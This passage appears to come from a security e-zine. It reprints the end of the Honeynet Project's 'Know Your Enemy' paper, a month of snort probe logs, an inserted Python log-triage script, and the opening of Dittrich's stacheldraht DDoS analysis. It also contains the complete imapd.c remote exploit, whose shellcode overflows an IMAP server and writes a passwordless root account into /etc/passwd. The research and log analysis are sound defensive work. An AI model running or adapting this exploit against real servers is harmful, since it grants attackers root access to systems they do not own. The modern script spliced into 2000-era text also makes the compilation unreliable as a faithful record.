           Sp07 joins the gang today. Not the friendliest individual for the Internet community. Seems to have taken a wee bit of a dislike to India also. 
      
           Day 11, June 14 
           They start cracking user passwords and access personal accounts. 
      
           Day 12, June 15 Also with Romanian Translated 
           D1ck and J4n3 try to find credit card numbers on a Credit Card channel so they can buy some domain names. 
      
           Day 13, June 16 Also with Romanian Translated 
           D1ck and J4n3 still hangout on the Credit Card channel. Members swap credit cards, shell accounts, and porn sites. At the end of the chat session, D1ck and J4n3 focus on their website. 
      
           Day 14, June 17 Also with Romanian Translated 
           D1ck and J4n3 cover how to gain accounts on a Linux box, talk more about Credit Cards and continue building a website.
      
      We have just reviewed 14 days in the life of the black-hat community. This is not meant to imply that all black-hats think and act like this. In fact, we have focused only on a few specific individuals. However, we hope this information gives you an idea of what many
      of the community are capable of. They may not be technically competent, or even understand the tools they are using. However by focusing on a large number of systems, they can achieve dramatic results. This is not a threat to take lightly. They are not concerned
      about what harm they may cause. They focus only on achieving their goals. 
      
      Conclusion 
      The purpose of this paper is to give you an understanding of the motives and psychology of the black-hat community. The paper started off with the system compromise of a Solaris 2.6 honeypot. It demonstrated a commonly used remote exploit of a vulnerable
      system. Once compromised, the system was quickly controlled with a rootkit, another commonly used tool among the black-hat community. However, what makes this paper unique is the look you get into the black-hat mentality. Here, you saw in their very own words
      how they think and act, particularly how they can indiscriminately attack and damage systems. They randomly probe large numbers of systems and attack the weakest systems they can find. By understanding their motives and methods, you can better protect your
      systems against this threat. 
      
      Acknowledgments 
      This paper is the result of the work and research of the Honeynet Project. The Honeynet Project is a small group of security professionals dedicated to learning the tools and tactics of the black-hat community. Part of the group's charter is to share these lessons
      learned with the security community. This paper is the first of future works by this group. Members of the group include: 
      
      Anne Marie Tenholder, Technology Research - Hiverworld, Inc. 
      Brad Powell, Sun Microsystems GESS Global Security Team 
      Chris Brenton, Dartmouth ISTS 
      David Dittrich, Senior Security Engineer - University of Washington 
      Ed Skoudis - Global Integrity Corp. 
      Frank Heidt - @stake 
      Fyodor, Author of Nmap Security Scanner and Insecure.Org. 
      George Kurtz, CEO - Foundstone, Inc. 
      K2 
      JD Glaser, NT Security Team - Foundstone, Inc. 
      John McDonald, TUV / Dataprotect GmbH 
      Lance Spitzner, Sun Microsystems GESS Global Security Team. 
      Martin Roesch, Director of Forensic Systems, Hiverworld, Inc 
      Max Vision, creator of arachNIDS and whitehats.com. 
      Robin Wakefield, Sun Microsystems GESS Global Security Team 
      Roger Safian 
      Saumil Shah, Principal Consultant (and Honeynet Project translator)- Foundstone, Inc. 
      Stuart McClure, - Foundstone, Inc. 
      Tom Stracener, Technology Research, Hiverworld, Inc. 
      Vacuum, Technotronic.com 
      
      Also, I would like to thank Alan Paller of SANS. Though not a member of the Honeynet Project, he has helped me make this research a reality. 
      
      @HWA      
            
306.0 [IND] Support docs and logs from the Know your enemy papers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      probed.txt - Know your enemy #1

      #
      # All the probes my network received in a single month.
      # Starting 15 April, 2000
      #
      # You can lookup the IDS number signatures at
      # Max Vision's ArachNIDs database at 
      # http://www.whitehats.com
      #
      # Signatures captured using snort
      # http://www.snort.org
      #
      
      Apr 15 13:40:41 mozart snort[7002]: IDS212/dns-zone-transfer: 207.239.115.11:2307 -> 172.16.1.101:53
      Apr 16 02:45:37 mozart snort[7483]: IDS13/portmap-request-mountd: 200.190.13.181:1372 -> 172.16.1.107:111
      Apr 16 07:17:06 mozart snort[7483]: IDS128/web-cgi-phf: 200.190.8.220:55220 -> 172.16.1.107:80
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.101
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.105
      Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.107
      Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.101:111
      Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.107:111
      Apr 17 09:45:28 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.105:111
      Apr 19 08:00:19 mozart snort[3515]: IDS/DNS-version-query: 212.25.75.196:1723 -> 172.16.1.101:53
      Apr 20 01:26:00 mozart snort[3515]: IDS212/dns-zone-transfer: 24.234.45.60:4075 -> 172.16.1.107:53
      Apr 20 03:49:38 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4349 -> 172.16.1.101:53
      Apr 20 03:49:39 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4350 -> 172.16.1.107:53
      Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
      Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
      Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
      Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
      Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
      Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
      Apr 20 23:00:33 mozart snort[12657]: IDS171/Ping zeros: 216.228.4.133 -> 172.16.1.101
      Apr 21 11:01:27 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4039 -> 172.16.1.101:53
      Apr 21 11:01:28 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4044 -> 172.16.1.107:53
      Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1368 -> 172.16.1.101:53
      Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1328 -> 172.16.1.107:53
      Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4401 -> 172.16.1.101:53
      Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4369 -> 172.16.1.107:53
      Apr 22 11:31:58 mozart snort[743]: IDS/RPC-rpcinfo-query: 213.1.152.141:728 -> 172.16.1.101:111
      Apr 23 01:33:51 mozart snort[3919]: IDS128/web-cgi-phf: 12.68.183.51:4310 -> 172.16.1.107:80
      Apr 23 01:33:56 mozart snort[3919]: IDS218/web-cgi-test-cgi: 12.68.183.51:4312 -> 172.16.1.107:80
      Apr 23 01:34:01 mozart snort[3919]: IDS235/web-cgi-handler: 12.68.183.51:4314 -> 172.16.1.107:80
      Apr 23 01:34:20 mozart snort[3919]: IDS219/web-cgi-perl-exe: 12.68.183.51:4321 -> 172.16.1.107:80
      Apr 23 01:34:36 mozart snort[3919]: IDS224/web-cgi-nph-test-cgi: 12.68.183.51:4328 -> 172.16.1.107:80
      Apr 23 21:01:18 mozart snort[3919]: spp_portscan: PORTSCAN DETECTED from 210.178.9.125
      Apr 23 21:01:25 mozart snort[3919]: IDS/RPC-rpcinfo-query: 210.178.9.125:850 -> 172.16.1.101:111
      Apr 24 07:09:47 mozart snort[4663]: IDS212/dns-zone-transfer: 210.145.109.162:12540 -> 172.16.1.107:53
      Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.107:111
      Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.101:111
      Apr 24 09:23:05 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:637 -> 172.16.1.107:111
      Apr 24 09:23:10 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:638 -> 172.16.1.101:111
      Apr 24 14:36:55 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.105
      Apr 24 14:43:35 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.101
      Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169
      Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
      Apr 24 17:59:51 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:2891 -> 172.16.1.101:53
      Apr 24 18:01:05 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
      Apr 24 19:04:01 mozart snort[4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
      Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
      Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
      Apr 25 02:38:17 mozart snort[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
      Apr 25 08:02:41 mozart snort[5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
      Apr 25 08:02:41 mozart snort[5875]: IDS/DNS-version-query: 24.9.255.53:2991 -> 172.16.1.101:53
      Apr 25 19:37:32 mozart snort[5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
      Apr 26 05:45:12 mozart snort[6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
      Apr 26 06:43:05 mozart snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
      Apr 26 06:45:34 mozart snort[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
      Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
      Apr 26 10:39:12 mozart snort[621]: spp_portscan: PORTSCAN DETECTED from 204.72.244.72
      Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.101:53
      Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.107:53
      Apr 26 17:11:07 mozart snort[621]: IDS128/web-cgi-phf: 207.239.115.11:3536 -> 172.16.1.105:80
      Apr 26 17:11:17 mozart snort[621]: IDS/DNS-version-query: 207.239.115.11:4727 -> 172.16.1.105:53
      Apr 29 21:05:06 mozart snort[5358]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
      Apr 29 21:05:06 mozart snort[5358]: IDS198/SYN FIN Scan: 212.109.2.136:1080 -> 172.16.1.105:1080
      Apr 30 02:06:37 mozart snort[5750]: spp_portscan: PORTSCAN DETECTED from 202.185.32.60
      Apr 30 02:06:37 mozart snort[5750]: IDS198/SYN FIN Scan: 202.185.32.60:0 -> 172.16.1.101:143
      May 1 04:03:40 mozart snort[6038]: spp_portscan: PORTSCAN DETECTED from 63.203.1.60
      May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3083
      May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3215
      May 1 06:36:53 mozart snort[6038]: IDS212/dns-zone-transfer: 63.203.1.60:1089 -> 172.16.1.101:53
      May 2 16:28:05 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1708 -> 172.16.1.101:53
      May 2 16:28:40 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1715 -> 172.16.1.101:53
      May 2 17:01:43 mozart snort[6443]: IDS/DNS-version-query: 24.114.97.247:3429 -> 172.16.1.101:53
      May 3 19:17:53 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
      May 3 19:17:53 mozart snort[6862]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
      May 3 20:34:15 mozart snort[6862]: IDS/RPC-rpcinfo-query: 200.241.69.1:3697 -> 172.16.1.101:111
      May 3 23:33:55 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 210.97.123.3
      May 3 23:33:55 mozart snort[6862]: IDS198/SYN FIN Scan: 210.97.123.3:0 -> 172.16.1.105:109
      May 4 04:59:35 mozart snort[7541]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
      May 4 04:59:35 mozart snort[7541]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
      May 4 15:32:17 mozart snort[7541]: IDS/DNS-version-query: 63.224.195.25:2293 -> 172.16.1.101:53
      May 4 19:14:34 mozart snort[7541]: IDS/DNS-version-query: 12.10.173.249:3434 -> 172.16.1.101:53
      May 5 06:06:52 mozart snort[8324]: IDS212/dns-zone-transfer: 211.38.95.197:2262 -> 172.16.1.101:53
      May 5 08:35:48 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:953 -> 172.16.1.101:111
      May 5 08:35:49 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:955 -> 172.16.1.101:111
      May 5 08:35:53 mozart snort[8324]: IDS20/portmap-request-sadmind: 139.130.213.4:901 -> 172.16.1.101:111
      May 5 08:35:54 mozart snort[8324]: IDS247/large-udp: 139.130.213.4:902 -> 172.16.1.101:32773
      May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:954 -> 172.16.1.101:111
      May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:956 -> 172.16.1.101:111
      May 5 16:04:21 mozart snort[8324]: IDS/RPC-rpcinfo-query: 195.117.3.58:970 -> 172.16.1.101:111
      May 5 17:04:28 mozart snort[8324]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
      May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.107:109
      May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.101:109
      May 5 17:42:24 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:2277 -> 172.16.1.101:53
      May 5 17:46:28 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1831 -> 172.16.1.101:53
      May 5 17:52:58 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1482 -> 172.16.1.101:53
      May 5 17:58:16 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3310 -> 172.16.1.101:53
      May 5 20:29:05 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1723 -> 172.16.1.101:53
      May 5 20:32:01 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3132 -> 172.16.1.101:53
      May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave)
      May 6 19:44:52 victim1.honeynet.org named[4991]: unapproved AXFR from [211.39.95.226].4958 for UICMBA.edu (not master/slave)
      May 7 19:22:22 victim1.honeynet.org named[4991]: unapproved AXFR from [216.190.204.3].1866 for UICMBA.edu (not master/slave)
      May 8 12:42:05 victim1.honeynet.org named[4991]: unapproved AXFR from [203.75.204.245].4542 for UICMBA.edu (not master/slave)
      May 8 21:53:03 lisa snort[387]: IDS118/Traceroute ICMP: 24.21.107.249 -> 172.16.1.104
      May 8 21:58:40 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
      May 8 21:58:41 lisa snort[387]: spp_portscan: PORTSCAN DETECTED from 24.21.107.249
      May 8 21:59:06 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
      May 8 22:16:06 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34536 -> 172.16.1.104:33457
      May 8 22:16:45 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.80:34546 -> 172.16.1.104:33446
      May 8 22:17:35 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34561 -> 172.16.1.104:33457
      May 9 08:02:54 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 216.61.43.89
      May 9 08:21:02 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 204.2.13.22
      May 9 09:39:28 lisa snort[2370]: IDS212/dns-zone-transfer: 206.133.123.19:2421 -> 172.16.1.101:53
      May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
      May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
      May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
      May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
      May 9 14:04:55 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 206.133.123.19
      May 9 14:04:57 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1720
      May 9 14:04:58 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1741
      May 9 14:05:08 lisa snort[2370]: IDS128/web-cgi-phf: 206.133.123.19:1815 -> 172.16.1.107:80
      May 9 14:05:09 lisa snort[2370]: IDS218/web-cgi-test-cgi: 206.133.123.19:1820 -> 172.16.1.107:80
      May 9 14:05:09 lisa snort[2370]: IDS235/web-cgi-handler: 206.133.123.19:1824 -> 172.16.1.107:80
      May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
      May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335
      
      EoF
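
One way to triage a log like probed.txt, as an added example that is not part of the original paper: it parses the three line formats seen above (snort alerts with or without ports, spp_portscan notices, named AXFR refusals), groups them by remote address, and separates alerts where a honeynet host is the sender. The 172.16.1.0/24 prefix and all function names are assumptions; the sample lines are copied from the log above.

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Assumption: the monitored honeynet is 172.16.1.0/24 (the log only shows
# hosts 172.16.1.101-107; the prefix length is not stated on the page).
HOME_NET = ipaddress.ip_network("172.16.1.0/24")

# Lines copied from probed.txt above, chosen to cover every line format.
SAMPLE_LOG = """\
Apr 15 13:40:41 mozart snort[7002]: IDS212/dns-zone-transfer: 207.239.115.11:2307 -> 172.16.1.101:53
Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.101
Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.105
Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169
Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
Apr 26 17:11:07 mozart snort[621]: IDS128/web-cgi-phf: 207.239.115.11:3536 -> 172.16.1.105:80
May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave)
May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
"""

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
SYSLOG = re.compile(r"^(?P<day>\w{3}\s+\d+) [\d:]{8} (?P<sensor>\S+) "
                    r"\w+\[\d+\]: (?P<msg>.*)$")
ALERT = re.compile(rf"^(?P<sig>.+?): (?P<src>{IP})(?::(?P<sport>\d+))? -> "
                   rf"(?P<dst>{IP})(?::(?P<dport>\d+))?$")
PORTSCAN = re.compile(rf"^spp_portscan: PORTSCAN DETECTED from (?P<src>{IP})$")
AXFR = re.compile(rf"^unapproved AXFR from \[(?P<src>{IP})\]\.\d+ for \S+")


@dataclass
class Event:
    day: str                   # "Apr 15" (the log carries no year)
    sensor: str                # syslog host that wrote the line
    signature: str
    remote: str                # address outside HOME_NET
    local: Optional[str]       # honeynet address, if the line names one
    local_port: Optional[int]  # port on the honeynet host, if any
    direction: str             # "in" = remote sent it, "out" = honeynet host sent it


def is_home(addr: str) -> bool:
    try:
        return ipaddress.ip_address(addr) in HOME_NET
    except ValueError:         # e.g. an octet above 255 in a damaged line
        return False


def parse_line(line: str) -> Optional[Event]:
    m = SYSLOG.match(line.strip())
    if not m:
        return None
    day, sensor, msg = " ".join(m["day"].split()), m["sensor"], m["msg"]
    if (p := PORTSCAN.match(msg)):
        return Event(day, sensor, "spp_portscan", p["src"], None, None, "in")
    if (x := AXFR.match(msg)):
        return Event(day, sensor, "named/unapproved-AXFR", x["src"], None, None, "in")
    if (a := ALERT.match(msg)):
        # Normalise so "remote" is always the outside party, whichever
        # side of the arrow it was logged on.
        if is_home(a["src"]):
            remote, local, port, direction = a["dst"], a["src"], a["sport"], "out"
        else:
            remote, local, port, direction = a["src"], a["dst"], a["dport"], "in"
        return Event(day, sensor, a["sig"], remote, local,
                     int(port) if port else None, direction)
    return None


def parse_log(text: str) -> list:
    return [e for line in text.splitlines() if (e := parse_line(line))]


def profile_sources(events) -> dict:
    """Group events by remote address: what it tried, against whom, on which days."""
    prof = defaultdict(lambda: {"signatures": set(), "targets": set(), "days": set()})
    for e in events:
        entry = prof[e.remote]
        entry["signatures"].add(e.signature)
        entry["days"].add(e.day)
        if e.local:
            entry["targets"].add(e.local)
    return dict(prof)


def repeat_sources(profiles: dict, min_days: int = 2) -> list:
    """Remote addresses seen on at least min_days distinct days."""
    return sorted(ip for ip, p in profiles.items() if len(p["days"]) >= min_days)


def outbound_alerts(events) -> list:
    """Alerts where a honeynet host is the sender; these deserve a look first."""
    return [e for e in events if e.direction == "out"]


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("returning sources:", repeat_sources(profile_sources(evts)))
    for e in outbound_alerts(evts):
        print("outbound:", e.day, e.local, "->", e.remote, e.signature)
```

Outbound lines such as the trin00 pong are replies sent by a honeynet host, so they describe the state of that host rather than a probe against it.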
            
      imapd.c exploit - Know your enemy #1
      
      /*
      
        This is the remote exploit of the hole in the imap daemon, for
        Linux.  The instruction code is doing open(), write(), and close()
        system calls, and  it adds a line root::0:0.. at the beginning of
        /etc/passwd (change to /etc/shadow if needed).  The  code needs to
        be self modifying since imapd turns everything to lowercase before
        it pushes it on the stack.  The problem  is that it  rewrites the
        first line of passwd/shadow,  therefore losing the root password.
      
        I'm sorry, but I don't have time to add in the seek syscall.
      
        - Akylonius (aky@galeb.etf.bg.ac.yu) [1997]
      
        Modifications made on 5.1.97 to accept command line hostname,  with
        'h_to_ip' function that resolves it to an ip.  -  p1 (p1@el8.org)
      
      */
      
      #include <string.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <stdio.h>
      #include <arpa/inet.h>
      #include <netdb.h>
      
      char *h_to_ip(char *hostname);
      
      char *h_to_ip(char *hostname) {
      
        struct hostent *h;
        struct sockaddr_in tmp;
        struct in_addr in;
      
        h = gethostbyname(hostname);
      
        if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }
      
        memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
        memcpy(&in,&tmp.sin_addr.s_addr,4);
      
      return(inet_ntoa(in));
      }
      
      void banner(void) {
        system("clear");
        printf("\nIMAP Exploit for Linux.\n");
        printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
        printf(" Modifications: p1 (p1@el8.org)\n");
      }
      
      main(int argc, char **argv) {
      
        int fd;
        struct sockaddr_in sckdaddr;
        char *hostname;
        char buf[4092];
        int i=8;
        char realegg[] =
          "\xeb\x58\x5e"
          "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
          "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
          "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
          "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
          "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
          "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
          "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
          "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
          "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff"
          "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
        char *point = realegg;
        buf[0]='*';
        buf[1]=' ';
        buf[2]='l';
        buf[3]='o';
        buf[4]='g';
        buf[5]='i';
        buf[6]='n';
        buf[7]=' ';
      
        banner();
      
        if (argc<2)  {
           printf("\nUsage: %s <hostname>\n\n", argv[0]);
           exit(-1);
        }
      
        hostname=argv[1];
      
        while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
          buf[i++]=0x90;
      
        while(*point)
          buf[i++]=*(point++);
      
        buf[i++]=0x83; /* ebp */
        buf[i++]=0xf3;
        buf[i++]=0xff;
        buf[i++]=0xbf;
        buf[i++]=0x88; /* ret adr */
        buf[i++]=0xf8;
        buf[i++]=0xff;
        buf[i++]=0xbf;
      
        buf[i++]=' ';
        buf[i++]='b';
        buf[i++]='a';
        buf[i++]='h';
        buf[i++]='\n';
      
        buf[i++]=0x0;
      
      
        if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the
      socket. \n");
      
        sckdaddr.sin_port=htons(143);
        sckdaddr.sin_family=AF_INET;
        sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
      
        if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0)
      perror("Error with connecting. \n");
      
        printf("hmm: \n");
        getchar();
        write(fd,buf,strlen(buf)+1);
        printf("hmm: \n");
        close(fd);
      }
      
      
      The stacheldraht DoS analysis - Know your enemy #1
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
      ==========================================================================
      
            The "stacheldraht" distributed denial of service attack tool
      
      ==========================================================================
      
      David Dittrich <dittrich@cac.washington.edu>
      University of Washington
      Copyright 1999. All rights reserved.
      December 29, 1999
      
      
      Introduction
      ------------
      
      The following is an analysis of "stacheldraht", a distributed denial
      of service attack tool, based on source code from the "Tribe Flood
      Network" distributed denial of service attack tool. [Note that
      throughout this analysis, actual nicks, site names, and IP addresses
      have been sanitized.]
      
      Stacheldraht (German for "barbed wire") combines features of the
      "trinoo" distributed denial of service tool, with those of the
      original TFN, and adds encryption of communication between the
      attacker and stacheldraht masters and automated update of
      the agents.
      
      For more information on trinoo and TFN, see:
      
              http://staff.washington.edu/dittrich/misc/trinoo.analysis
              http://staff.washington.edu/dittrich/misc/tfn.analysis
      
      In late June and early July of 1999, one or more groups were
      installing and testing trinoo networks and waging medium to large
      scale denial of service attacks employing networks of over 2000
      compromised systems.  These attacks involved, and were aimed at,
      systems around the globe.
      
      In late August/early September of 1999, focus began to shift from
      trinoo to TFN, presumed to be the original code by Mixter.  Then in
      late September/early October, a program that looked a lot like the TFN
      agent, known as "stacheldraht", began to show up on systems in Europe
      and the United States.
      
      These attacks prompted CERT to release Incident Note 99-04:
      
              http://www.cert.org/incident_notes/IN-99-04.html
      
      Like trinoo, stacheldraht is made up of master (handler) and daemon,
      or "bcast" (agent) programs.  The handler/agent terminology was
      developed at the CERT Distributed System Intruder Tools workshop held
      in November 1999, and will be used in this analysis instead of the
      stacheldraht specific terms.  It is highly recommended that the
      CERT workshop report be read as well. See:
      
              http://www.cert.org/reports/dsit_workshop.pdf
      
      There is some competition to stacheldraht in the form of Mixter's new
      version of TFN -- Tribe Flood Network 2000, or TFN2K -- released on
      December 21, 1999.  For more on TFN2K, see:
      
              http://packetstorm.securify.com/distributed/
              http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
      
      Along with trinoo's handler/agent features, stacheldraht also shares
      TFN's features of distributed network denial of service by way of ICMP
      flood, SYN flood, UDP flood, and "Smurf" style attacks.  Unlike the
      original TFN and TFN2K, the analyzed stacheldraht code does not
      contain the "on demand" root shell bound to a TCP port (it may be
      based on earlier TFN code than was made public by Mixter in mid-1999).
      
      One of the weaknesses of TFN was that the attacker's connection to the
      master(s) that control the network was in clear-text form, and was
      subject to standard TCP attacks (session hijacking, RST sniping, etc.)
      Stacheldraht deals with this by adding an encrypting "telnet alike"
      (stacheldraht term) client.
      
      Stacheldraht agents were originally found in binary form on a number
      of Solaris 2.x systems, which were identified as having been
      compromised by exploitation of buffer overrun bugs in the RPC services
      "statd", "cmsd" and "ttdbserverd".  They have been witnessed "in the
      wild" as late as the writing of this analysis.
      
      After publishing analyses of trinoo and Tribe Flood Network on Bugtraq
      in December 1999, an incident investigator at another institution
      provided stacheldraht source code that was obtained from a file cache
      in a stolen account.  (I would like to thank this investigator, and
      also thank the folks at SecurityFocus for providing the open forum
      that allowed this to occur.)  This analysis was done using this
      captured source code (labelled version 1.1, with source file
      modification dates ranging from 8/15/1999 to 10/17/1999).
      
